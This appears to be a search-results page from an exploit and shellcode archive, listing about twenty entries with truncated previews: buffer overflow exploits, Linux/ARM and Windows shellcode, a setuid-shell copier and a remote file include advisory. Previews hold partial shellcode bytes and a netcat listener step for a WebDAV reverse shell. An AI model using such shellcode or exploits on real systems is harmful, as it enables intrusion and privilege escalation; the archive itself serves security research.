7261 matches found
Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
No description provided by source. / Title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes Date: 2010-06-25 Author: RubberDuck Web: http://bflow.security-portal.cz Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG 32, Win Vista 32/64, Win 7 32/64, Win 2k8 32 Thanks to:...
PSOProxy 0.91 Remote Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/9706/info It has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking. A malicious user may exploit this condition to potentially corrupt...
Mini-stream RM-MP3 Converter 3.0.0.7 - (.pls) Universal Stack BoF
No description provided by source. !/usr/bin/perl Mini-stream RM-MP3 Converter Version 3.0.0.7 .pls Universal Stack Overflow Exploit Author: mat Mail: [email protected] my $shellcode = \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49...
MS Windows WebDAV - (ntdll.dll) Remote Exploit
No description provided by source. // / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / / --------------------------------------------------------------- / / this is the exploit for ntdll.dll through WebDAV. / / run a netcat ex: nc -L -vv -p 666 / / wb server.com yourip 666 0 / / the...
Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/1138/info A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a...
Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (1)
No description provided by source. source: http://www.securityfocus.com/bid/1158/info Sniffit is a freely available, open source network monitoring tool. It is designed for use on the Unix and Linux Operating Systems. Sniffit contains a remotely exploitable buffer overflow vulnerability. If Sniff...
TORCS 1.3.1 acc Buffer Overflow
No description provided by source. / Exploit Title: TORCS acc Buffer Overflow Date: 20/12/2011 Author: Andres Gomez Software Link: http://torcs.sourceforge.net/ Version: torcs 1.3.1 Tested on: Windows CVE : / / This exploit generates a corrupted acc file which has to be saved in the directories...
MailEnable Mail Server IMAP <= 1.52 Remote Buffer Overflow Exploit
No description provided by source. / MailEnable , IMAP Service, Remote Buffer Overflow Exploit v0.4 Homepage : www.mailenable.com Affected versions: Pro v1.52 Enterprise v1.01 Bug discovery : Nima Majidi at www.hat-squad.com Exploit code : class101 at www.hat-squad.com & dfind.kd-team.com Fix :...
39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
No description provided by source. / Name : 39 bytes syssetuid0 & syssetgid0 & execve /bin/sh x86 linux shellcode Date : Tue Jun 1 21:29:10 2010 Author : gunslinger yudha.gunslingeratgmail.com Web : http://devilzc0de.org blog : http://gunslingerc0de.wordpress.com tested on : linux debian / includ...
Linux/ARM - setuid(0) & execve("/bin/sh","/bin/sh",0) - 38 bytes
No description provided by source. / Title: Linux/ARM - setuid0 & execve/bin/sh,/bin/sh,0 - 38 bytes Date: 2010-06-29 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Dtabase of shellcodes http://www.shell-storm.org/shellcode/...
ARM Polymorphic execve("/bin/sh", ["/bin/sh"], NULL) Shellcode Generator
No description provided by source. / Title: Generator polymorphic shellcode on ARM architecture Date: 2010-07-07 Tested on: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Database of shellcodes http://www.shell-storm.org/shellcode/...
linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes
No description provided by source. / Linux/x86 setreuid0,0 + execve/bin/sh, /bin/sh, NULL - 33 bytes - [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \x31\xc9 // xor %ecx, %ecx \xcd\x80 // int $0x80 \x31\xd2 // xor %edx, %edx \x6a\x0b // pus...
Word Splash Pro <= 9.5 - Buffer Overflow
No description provided by source. Exploit Title: Word Splash Pro = 9.5 Buffer Overflow -EggHunter- Software Link: http://www.chronasoft.com/software/wordsplashpro Version: = 9.5 Tested on: Win XP SP3 French Date: 20/12/2010 Author: h1ch4m Email: [email protected] Home: Net-Effects.blogspot.com Gree...
linux/x86 cp /bin/sh /tmp/katy ; chmod 4555 katy 126 bytes
No description provided by source. / Linux/x86 /bin/cp /bin/sh /tmp/katy ; chmod 4555 /tmp/sh using fork / include stdio.h char shellcode = \xeb\x5e\x5f\x31\xc0\x88\x47\x07\x88\x47\x0f\x88\x47\x19\x89\x7f \x1a\x8d\x77\x08\x89\x77\x1e\x31\xf6\x8d\x77\x10\x89\x77\x22\x89...
Linux i686 - pacman -R <package> - 59 bytes
No description provided by source. / Title : Linux i686 - pacman -R package - 59 bytes Author : Jonathan Salwan Mail : submit ! shell-storm.org Web : http://www.shell-storm.org Pacman is a software package manager, developed as part of the Arch Linux distribution. With this shellcode you can remo...
GlobalLink 2.6.1.2 'HanGamePlugincn18.dll' ActiveX Control Multiple Buffer Overflow Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/27626/info GlobalLink is prone to multiple buffer-overflow vulnerabilities because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. An attacker can exploit...
Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM)
No description provided by source...
Visitor Logger (banned.php) Remote File Include Vulnerability
No description provided by source. - Visitor Logger banned.php Remote File Include Vulnerability - Date: 2010/05/31 - Vendor: http://www.graviton-mediatech.com - Download: http://www.graviton-mediatech.com/downloads/Visitor-Logger/Visitor-Logger.zip - Googledork: n/a - Discovered by bd0rk -...
Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit (ppc)
No description provided by source. !/usr/bin/perl getpwnedmail.pl http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom This is a canibalized version of Kansas City POP Daemon Version 0.0 - Copyright c 1999 David Nicol [email protected] kevin-finisterres-mac-mini:...
Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2)
No description provided by source. Exploit v2 features: - Target Remote port 445 by default but requires auth - Manual target for dynamic tcp port without auth - Automatic search for dynamic dns rpc port - Local and remote OS fingerprinting auto target - Windows 2000 server and Windows 2003 serve...